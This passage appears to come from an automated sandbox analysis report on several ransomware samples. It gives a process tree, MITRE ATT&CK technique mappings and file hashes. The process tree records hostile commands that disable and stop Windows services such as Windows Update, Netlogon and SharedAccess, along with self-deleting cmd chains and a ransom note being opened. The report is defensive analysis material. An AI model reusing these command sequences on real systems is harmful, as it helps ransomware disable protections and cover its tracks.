- Launches sc.exe
PID:2916
-
-
C:\Windows\system32\sc.exesc config "vmicshutdown" start= disabled5⤵
- Launches sc.exe
PID:692
-
-
C:\Windows\system32\sc.exesc stop "vmicshutdown"5⤵
- Launches sc.exe
PID:4076
-
-
C:\Windows\system32\sc.exesc config "vmicguestinterface" start= disabled5⤵
- Launches sc.exe
PID:3512
-
-
C:\Windows\system32\sc.exesc stop "vmicguestinterface"5⤵
- Launches sc.exe
PID:1876
-
-
C:\Windows\system32\sc.exesc config "vmickvpexchange" start= disabled5⤵
- Launches sc.exe
PID:1568
-
-
C:\Windows\system32\sc.exesc stop "vmickvpexchange"5⤵
- Launches sc.exe
PID:2352
-
-
C:\Windows\system32\sc.exesc config "SharedAccess" start= disabled5⤵
- Launches sc.exe
PID:2964
-
-
C:\Windows\system32\sc.exesc stop "SharedAccess"5⤵
- Launches sc.exe
PID:4516
-
-
C:\Windows\system32\sc.exesc config "IEEtwCollectorService" start= disabled5⤵
- Launches sc.exe
PID:1916
-
-
C:\Windows\system32\sc.exesc stop "IEEtwCollectorService"5⤵
- Launches sc.exe
PID:1608
-
-
C:\Windows\system32\sc.exesc config "iphlpsvc" start= disabled5⤵
- Launches sc.exe
PID:1428
-
-
C:\Windows\system32\sc.exesc stop "iphlpsvc"5⤵
- Launches sc.exe
PID:1316
-
-
C:\Windows\system32\sc.exesc config "MSiSCSI" start= disabled5⤵
- Launches sc.exe
PID:3520
-
-
C:\Windows\system32\sc.exesc stop "MSiSCSI"5⤵
- Launches sc.exe
PID:4020
-
-
C:\Windows\system32\sc.exesc config "NetTcpPortSharing" start= disabled5⤵
- Launches sc.exe
PID:3392
-
-
C:\Windows\system32\sc.exesc stop "NetTcpPortSharing"5⤵PID:1224
-
-
C:\Windows\system32\sc.exesc config "Netlogon" start= disabled5⤵
- Launches sc.exe
PID:3288
-
-
C:\Windows\system32\sc.exesc stop "Netlogon"5⤵
- Launches sc.exe
PID:3016
-
-
C:\Windows\system32\sc.exesc config "napagent" start= disabled5⤵
- Launches sc.exe
PID:2796
-
-
C:\Windows\system32\sc.exesc stop "napagent"5⤵
- Launches sc.exe
PID:4720
-
-
C:\Windows\system32\sc.exesc config "CscService" start= disabled5⤵
- Launches sc.exe
PID:4948
-
-
C:\Windows\system32\sc.exesc stop "CscService"5⤵
- Launches sc.exe
PID:2804
-
-
C:\Windows\system32\sc.exesc config "PNRPsvc" start= disabled5⤵
- Launches sc.exe
PID:2676
-
-
C:\Windows\system32\sc.exesc stop "PNRPsvc"5⤵
- Launches sc.exe
PID:464
-
-
C:\Windows\system32\sc.exesc config "p2pimsvc" start= disabled5⤵
- Launches sc.exe
PID:4208
-
-
C:\Windows\system32\sc.exesc stop "p2pimsvc"5⤵
- Launches sc.exe
PID:2180
-
-
C:\Windows\system32\sc.exesc config "RemoteAccess" start= disabled5⤵
- Launches sc.exe
PID:2528
-
-
C:\Windows\system32\sc.exesc stop "RemoteAccess"5⤵
- Launches sc.exe
PID:3572
-
-
C:\Windows\system32\sc.exesc config "wuauserv" start= disabled5⤵
- Launches sc.exe
PID:2352
-
-
C:\Windows\system32\sc.exesc stop "wuauserv"5⤵
- Launches sc.exe
PID:2964
-
-
C:\Windows\system32\sc.exesc config "wcncsvc" start= disabled5⤵
- Launches sc.exe
PID:2648
-
-
C:\Windows\system32\sc.exesc stop "wcncsvc"5⤵
- Launches sc.exe
PID:428
-
-
-
-
C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Foreign.ofow-2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae.exeTrojan-Ransom.Win32.Foreign.ofow-2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\ProgramData\images.exe"C:\ProgramData\images.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3716
-
-
-
-
C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exeTrojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exe3⤵
- Executes dropped EXE
PID:2004 -
C:\Users\Admin\AppData\Roaming\AccessRendezvous\EnhancementC:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement /go4⤵
- Executes dropped EXE
PID:852 -
C:\Windows\SYSTEM32\cmd.execmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement" & del "C:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement" & rd "C:\Users\Admin\AppData\Roaming\AccessRendezvous\"5⤵PID:2444
-
C:\Windows\system32\waitfor.exewaitfor /t 10 pause /d y6⤵PID:4828
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\AccessRendezvous\Enhancement"6⤵
- Views/modifies file attributes
PID:3756
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exe" & del "C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exe" & rd "C:\Users\Admin\Desktop\00414\"4⤵PID:2008
-
C:\Windows\system32\waitfor.exewaitfor /t 10 pause /d y5⤵PID:3700
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exe"5⤵
- Views/modifies file attributes
PID:2216
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 748 -ip 7481⤵PID:388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 748 -ip 7481⤵PID:4500
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4112
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Documents\HOW-TO-DECRYPT-gn9cj.txt1⤵PID:3820
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
2Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD5119ca34bd8a50ef617f474f56bec89d2
SHA1f04e05e6877439b38f7196ce180b1b83471134d6
SHA256c7340b72b2b49f6d216b5793f89dcf146a001fe16947ea9b44c51319d7db508a
SHA51277ed344d9490b76e3c9d7266d35f0d403c4ab0b3a273a082da665cf053b57bdf935b49cecc498a381409ce16c48476fa80c3836ba60267e69331f34f8208014b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD5cbad59f2a877a24a3e3436391e6e7dbd
SHA17c3a4713faf280a0b9316db3ff141edf0d5ca53a
SHA256ebddb02cf43dfd1f1f05d0052048ac3dfdf160b0ba71d55ddda576a0ddffa4c2
SHA512b3a98411db61eacd61c09a9a71384c399b8d273264748d956a99ec7eac1b9cece112a107d5930db5762a852a44bd9fada07be2d8e17cd58102f4cce098a0c137
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
Filesize
3KB
MD59275888ff69ac5ec63ab5d4d85378649
SHA11027e519f7cffe07d5a32b18c6a48e0677971bca
SHA25656de06ca874d15d3dbf270ea7452c2a64c603589bf30406c1749e839fc14fe81
SHA512de9e6cd5d0dd96bd685c427fcb9eb7346b173ee842a2c907c5eca7578747ddb17b00647582d230752874050ee08fcef37ba85717fba25a856270aa5865bce9cf
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
830B
MD50eef69079adf48e3054047733b8bb8ad
SHA17efb70c86d1cb5b8c38c38b57ede1d6faf2c0dc6
SHA256b5207a645836ac4a9d910f8db6a942a8ac6b71b876c1e1924d73205933b048c5
SHA51237c4f96fcae947d335c348e24ddad96fd1f1a3096310701b75a546fac41ffaf7d9efa1cb69016cb0f603ca2caaa190ceb173fa227fbe7775c0bfe6a19dbb9ad4
-
C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.MSIL.Encoder.vho-30b877a266dc809a469155ab42de7ad0e225e15777870b03a049ddb1123217d4.exe
Filesize106KB
MD55022d9cf4a4195d6ff21c1cc3d827fa1
SHA12c8fccdff1e0f9b3114ddf35b5db168a07342db2
SHA25630b877a266dc809a469155ab42de7ad0e225e15777870b03a049ddb1123217d4
SHA512680607038a22e2959f7f3764a6a8ab56fc865e06a779af7a324a2d478dc7bd9c613c619ed22448064b2094dc79b925dd0fc59d277081a4055811e52cbd3ca396
-
C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.Win32.Blocker.gen-248eabc9c97d8c4994c26c88cf1806ea9274eb187e3eb0bae7ae8035c7f3b189.exe
Filesize706KB
MD554a4be7037ecdb031563998906a365cd
SHA1e19e35a43087696fc4e7ac0dfeea4ea19fed8f28
SHA256248eabc9c97d8c4994c26c88cf1806ea9274eb187e3eb0bae7ae8035c7f3b189
SHA512515c6edb804b85cdaa610a275cfda7490884a42dc5c1585681d13d644c0e5b2ef363dff586e24e1a44410db85e49ee3e2c9737b865f1f9e84271dc5800dbd60d
-
C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.Win32.Encoder.gen-a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c.exe
Filesize2.5MB
MD560a6656a9282f0a87aeb151a509eda37
SHA167bec70270c252f9ac0836f66a2599f5a7c465a2
SHA256a868deb14742d23911aba5e97f35ecd8ac35effbe24b1f5f5b631c9d17d1481c
SHA51220909c51dc56f60637b09627e220e5a1941a0c61d9d4f5e7060e5c1a7555e93c2040e0d61bfb88bfdf4b817fa1a166c7d71c07603aa4a0413c8da1b3db1ba874
-
C:\Users\Admin\Desktop\00414\HEUR-Trojan-Ransom.Win32.Generic-5e58a1576d022944a3f18102fe5ff04a8b4d56918003b53b914beece11e63868.exe
Filesize279KB
MD54233dc042a9e68b1f27147d47350ba92
SHA10fe264e1db45807db51309cf0b3944bdbdd1d485
SHA2565e58a1576d022944a3f18102fe5ff04a8b4d56918003b53b914beece11e63868
SHA512c03e542aa427113cd88f9683fa07f446f51e248f3c5112c4b1f36ea20b08fae796c9f99566eb728f46462f0adb74170ddc7c096e265e31ff51dd25411849d957
-
C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.exe
Filesize2.7MB
MD5b175c381c21ed8e3d7a12404705b691b
SHA1d473d612c4455ae135b9b28a9e99c16d10d90c58
SHA25620dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37
SHA5127aaa71ceffafca907a1898b71b066735b9df7eacf1ae2593c261e9ded1924abc22cc4ebda8e5481bccc32bd8d8f46c43d9e92e36fcaf37dc28b6d09b4bfc328a
-
C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Cryrar.hev-3f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f.exe
Filesize88KB
MD5eaf94c9a09fe87ea58f0996ae3233a91
SHA18307d6fc8b57b2f86bde7f43d709f3d5d970836a
SHA2563f967d306e6de83d8dd19745c0d6d3f94433ac29d4ddf9ad87dd1d4110cd700f
SHA512d4168e0115f72ed71c231ee30ce232a3b06312431b38a007d86627e5c876c0fce86ea8be70449b07297341037b6643b9977541ca944085d28c65f44e942323fd
-
C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Foreign.ofow-2776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae.exe
Filesize691KB
MD5134728554409720296acbfd5cecef4ac
SHA1cc67c4dae17b6aa23716e5f2855b54521e57e427
SHA2562776ed9eb0edfbe497366e4af177893a8dad3044c8c0dd3e37c559b748c337ae
SHA512d60ab95f4005c88095492ed4bcff518f6502366548826bc231640c9f3c75b611f3fb536c055b5daad15c35f3c52e4d8f7c5573c94d17b870e7d8f4d2d34bb5f2
-
C:\Users\Admin\Desktop\00414\Trojan-Ransom.Win32.Hades.a-ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d.exe
Filesize1.8MB
MD57d4550dd4c6996057147ecc996b14e9a
SHA1d0d68281f8459b5558559fbbf8c6c8ab4ddfec8b
SHA256ea310cc4fd4e8669e014ff417286da5edf2d3bef20abfb0a4f4951afe260d33d
SHA512e0653ac9c92bd134ff43886b4a8a36016660294c134ff11c6cddefe50494923fdcf370c3d96d5538d2c7ef20d216b4d15b914d40002c982c69021ee8998f57df
-
Filesize
3KB
MD50c6d0a67b942d06fe27f41c7c582cdfe
SHA17e674cf6375b138cabca2706583d4ced7a1aef27
SHA256014ea5effc97085b7832512b9ad2a5c4487265eb67e8d7b0920ef2bc8768400c
SHA51253ec4509bc58f53419a8923d808c7dfdecf57dc203c37265d061aebab73147720d1c419e79578065a42c3b2a63504370f90516c3f0afad5d6997952592d3a39c
-
Filesize
1.4MB
MD5921cfacfd1cf49e625ef64c0c50a39fe
SHA1f1dfa590ee16fb61022dfab0d370b2d6e1ab6026
SHA2563df92ad1bae6037e39a80a18dfd0aafe75f42911daab625bd1618c306c367d5d
SHA512f95bd6a95bcd6443ee56a1c9b490b4df9129a7cfbff8c42365ee80d1b9fd32e6452f52ddcf75a8a844ecbbc8b52d550fd7d5a54c10a28729cf60754e35fd6737
-
Filesize
970B
MD54092edebdecbd951d472a70ab773e2d3
SHA13726f7bae5b04996519dcb14b97c191408099a85
SHA2563b79f0e2fa8a82f00a14f9f1dd9b9a495487bfed6bd1978235627b023bd9d629
SHA512b8755f9e816305fc77fe9c0026981536ed60818e3b7e32ed315d1bdead9f887170f09c0f381168d3c2c626e2e842d0a3b86006e2c77e6f9f17de9af1dc6aeffe
-
C:\Users\Admin\RDP6\Trojan-Ransom.Win32.AutoIt.ziq-20dc1a7d2186d078e6ecbe888855155ac683827efd9e052f7f85243bfc4d8c37.txt
Filesize1KB
MD5b949be5207c126c47f0e9568c425c0a9
SHA1c9bf430ab09db0d711940211314d578d423dfaf2
SHA2566a145074fa80b03722f364728f662ac7911aaceaddd12856678e239398a33eea
SHA512917b6e651d816d5d64acc6bcc453a375e35c49fb8901182bbe76944870ee6b7ddb199b34b4b00fce5239bcf0eca6728b62fa17302f93f38aefed86b59b3087cf
-
Filesize
137KB
MD5e45b9771404521d44d411b3ce9f6c8ac
SHA1b6f13100ade2b42f0ae148b7b23987d0dbbebf5f
SHA256165a4240ed4bff512c5a6e69bb77d2606c9fc0e6273db1acb4e7e643d364f814
SHA51260bd27fc02bb0f82e19fce92d84d4037d8488aa0d18b448747da6c266cc8c3e56b07a83401da4b28ea9b4cac77b5ba15134f53fad73407a22aa7ba032aa1e798
-
Filesize
8KB
MD50a3767472082815dd5126983fd004f34
SHA1c41dc8b199b4d2cc0dfa9e0eb612e0fc3eff9fec
SHA25691ca63fe192bf1bac2cc5405b2b0494f417028dbb7429e02a0a465977eb355dd
SHA512ea7deea4d980057fda994eb856fc537c1e7d8b918ba95db246a4d667f2a54b1468373fcdc818a7b753d6ebb0ac107acca24ea849a4c27f4065301a68cae081d1
-
Filesize
7KB
MD5feb0692918248950d909d114b957d722
SHA16858973ee8e05a16aabae9065f10617d4147e826
SHA2563c1fb9294d8e0c12d608d3d59a798d3b065a06c1f845fdbceafd22b31096c10a
SHA512d9e7eb8746686b3864ec25b662e05747ed35c954650c6feb064417abfa93257eef1862235bd3d60c0f9098cdcb0f915025325b9fd1d853b32b5d23a187b851f7
-
Filesize
8KB
MD5be7e85a3d27a6489b6f0a8b3d552f41f
SHA162d938fac0779c9d722dce8b927aedd8268483af
SHA256a6d8f953a1cc5c121a27ddedab7acdee19b95877f45f97e67617ac8a20eef161
SHA5127f0b9b1fef129b870014434acd5fecd48cfc52b48b824419a257fe88254fa5fd60babe71aa98700830fd1bf06a0539dc2aca74ae14e4f9ab5cbe2d489aa6c046
-
Filesize
8KB
MD5664f744146c579405c94f2641276de27
SHA1f2c1bb74de77b1713845f19d94b4a1a39214b37b
SHA256707aa269153242c45da813a38a012f99363d74c68fd5df45457fc7a771350c9e
SHA512855ffa5dd14dc7ee3262ca2f5e978515db6d0a0cdd0a87000c1def07236bec97787e846850163cda51fe1d5cd92cbb2331c1fd0bdd9ac23ae336f59a01f3c530
-
Filesize
161KB
MD5b523bebd004768f96ffeec26fe0c3a44
SHA14f060b59fbb8e91f8f347844ddd62138ab0d1a88
SHA256f256ed6478e5644232411ac4ab0935ead22796581cf64c7e423fabd4d3fd8a7d
SHA5128b51263e3440fe18a3e35a3ffb10eecee898c6ca8bab4ef32833912178ff02d6e92903107d55dbcf961c73a5576be9e2f04dc43cdda15f7a728f149ae66971d8